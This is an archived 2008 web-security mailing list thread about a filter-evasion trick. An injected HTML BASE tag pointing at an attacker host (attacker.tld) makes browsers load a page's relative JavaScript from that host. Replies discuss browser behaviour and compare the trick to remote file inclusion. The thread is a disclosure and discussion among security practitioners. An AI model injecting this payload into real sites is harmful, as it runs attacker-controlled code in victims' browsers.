[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [WEB SECURITY] Nice little XSS trick
- From: "Ryan Barnett" <rcbarnett@xxxxxxxxx>
- Subject: Re: [WEB SECURITY] Nice little XSS trick
- Date: Tue, 15 Jul 2008 13:13:24 -0400
Interesting - there is a hint of remote file inclusion going on here
except that it is browser-side vs what we usually see server side with
PHP.
On 7/15/08, Prasad Shenoy <prasad.shenoy@xxxxxxxxx> wrote:
> Amit -
>
> When you say observed by FF 2, I guess you mean this should not work
> in FF 2 correct? But it works with FF 2.
>
> As this is a very simple example, I would like to believe that you are
> assuming that in order to invoke functions from the attacker
> controlled JS file (because there is no JS involved in the payload),
> the attacker would create a file with the same filename and function
> names as the one on the victim's domain. This way the actual (good) JS
> file will be overwritten by the attacker controlled JS and all the
> functions will be called from cross domain.
>
> Valid?
>
> Thanks
> Prasad Shenoy
>
> Prasad Shenoy
> On Tue, Jul 15, 2008 at 7:33 AM, Amit Klein <aksecurity@xxxxxxxxx> wrote:
>> Hi list
>>
>> Recently I've been thinking about bypassing anti-XSS filters, and a nice
>> little trick occurred to me, which I haven't seen anywhere (e.g. it's not
>> on
>> RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention
>> BASe, but not the trick I describe here). The idea is to use the HTML BASE
>> tag to force loading of JS code from the attacker's host. Consider a page
>> with XSS vulnerability such as:
>>
>> <html>
>> ...
>> ***XSS code may be embedded here***
>> ...
>> <script src="/foo/bar.js"></script>
>> ...
>> </html>
>>
>> Now, an attacker can inject <base href="http://www.attacker.tld/";>, and
>> next
>> thing you know, the browser (IE, at least) loads the JS from
>> http://www.attacker.tld/foo/bar.js... And the beauty is that there's no
>> "explicit" JS code involved in the payload itself.
>>
>> Note that according to the HTML standard, BASE should be placed in the
>> HEAD
>> section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE). This
>> is
>> indeed observed by FF 2, but not by IE (checked IE6).
>>
>> Thanks,
>> -Amit
>>
>>
>> ----------------------------------------------------------------------------
>> Join us on IRC: irc.freenode.net #webappsec
>>
>> Have a question? Search The Web Security Mailing List Archives:
>> http://www.webappsec.org/lists/websecurity/archive/
>>
>> Subscribe via RSS: http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>>
>> Join WASC on LinkedIn
>> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>>
>>
>
>
>
> --
> Ah! the joy of hacking....
>
> ----------------------------------------------------------------------------
> Join us on IRC: irc.freenode.net #webappsec
>
> Have a question? Search The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
>
> Subscribe via RSS:
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
> Join WASC on LinkedIn
> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>
>
--
Ryan C. Barnett
ModSecurity Community Manager
Breach Security: Director of Application Security
Web Application Security Consortium (WASC) Member
CIS Apache Benchmark Project Lead
SANS Instructor, GCIA, GCFA, GCIH, GSNA, GCUX, GSEC
Author: Preventing Web Attacks with Apache
----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA
Brought to you by http://www.webappsec.org
Search this site
|